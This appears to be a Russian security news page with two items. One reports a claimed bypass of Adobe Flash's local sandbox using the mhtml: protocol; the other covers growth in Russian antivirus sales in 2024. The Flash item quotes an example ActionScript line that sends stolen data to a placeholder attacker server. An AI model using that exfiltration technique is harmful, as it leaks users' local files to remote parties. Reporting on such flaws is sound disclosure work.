Простой способ обхода «песочницы» Flash

Простой способ обхода «песочницы» Flash

Был найден специалистом в области безопасности. Он утверждает, что даже если файл был запущен локально, то для злоумышленника отправить его на удаленный сервер не составит труда.

Как известно, компания Adobe в своей продукции предусмотрела некоторые меры по защите доступа к сети. Одной из мер является встроенная в приложение «песочница», посредством которой осуществляется контроль доступа к сети через черный список. В этот список включены заголовки протоколов, например HTTP и HTTPS.

Однако, исследователь в области безопасности Билли Риос, утверждает, что можно отправлять файлы на сервер, используя в заголовках запись «file:», но в этом случае данные будут гулять по локальной сети. А для отправки данных на удаленный сервер, по его мнению, вполне подойдет заголовок – mhtml.

Этот заголовок по умолчанию поддерживается в операционных системах семейства Windows, и поэтому данные могут быть отправлены при помощи ActionScript команды: «getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);». Стоит заметить, что для подтверждения своей гипотезы специалист не привел никаких демонстрационных материалов.

Конечно, удивительно, что настолько легко и просто можно обойти одну из «песочниц»
Flash. Однако, это открытие не представляет серьезной опасности, поскольку вряд ли пользователи будут специально скачивать себе на компьютер SWF файл, чтобы просмотреть через плеер. Обычно, такие файлы просматриваются в обозревателе, где предусмотрен иной набор правил.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Продажи антивирусов выросли в 2024 году на 41%

В 2024 году количество проданных лицензий на антивирусные продукты выросло на 41%, а средний чек увеличился на 8% и составил 1670 рублей. Наибольшим спросом пользовались годовые лицензии на одно рабочее место, которые продлевались по подписке.

Такие данные опубликовало издание «Коммерсант», проанализировав статистику сервиса «Чек Индекс» компании «Платформа ОФД».

Рост интереса к антивирусам объясняется увеличением числа цифровых угроз и ростом активности пользователей в интернете.

«Увеличение продаж связано как с появлением новых устройств и пользователей, так и с переходом на платные версии тех, кто ранее пользовался бесплатными антивирусами», — прокомментировали в «Чек Индексе» итоги года.

По словам ведущего эксперта по сетевым угрозам компании «Код безопасности» Константина Горбунова, на динамику рынка также повлияло отложенное влияние ухода зарубежных вендоров с российского рынка, а также учащение кибератак и рост числа заражений устройств. Эти факторы стимулировали переход пользователей с бесплатных антивирусов на платные.

Эксперт по кибербезопасности компании Angara Security Никита Новиков отметил, что встроенный Windows Defender не обладает достаточной функциональностью для защиты от массовых угроз. Это повышает риски для безопасности, и все больше пользователей начинают рассматривать платные антивирусные продукты как более надежное решение.

Согласно данным «Лаборатории Касперского», в 2024 году с различными киберугрозами столкнулись 57% россиян. Как подчеркнул руководитель управления потребительского рынка «Лаборатории Касперского» в России и СНГ Сергей Пиккат-Ордынский, помимо вредоносных программ, особую опасность представляет фишинг.

Однако антивирусы не всегда являются универсальным решением. Константин Горбунов отметил, что защитные продукты не всегда распознают приложения, которые формально не наносят вреда устройству, но могут передавать данные злоумышленникам. В результате, например, поддельные приложения российских банков нередко остаются вне поля зрения антивирусных программ.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru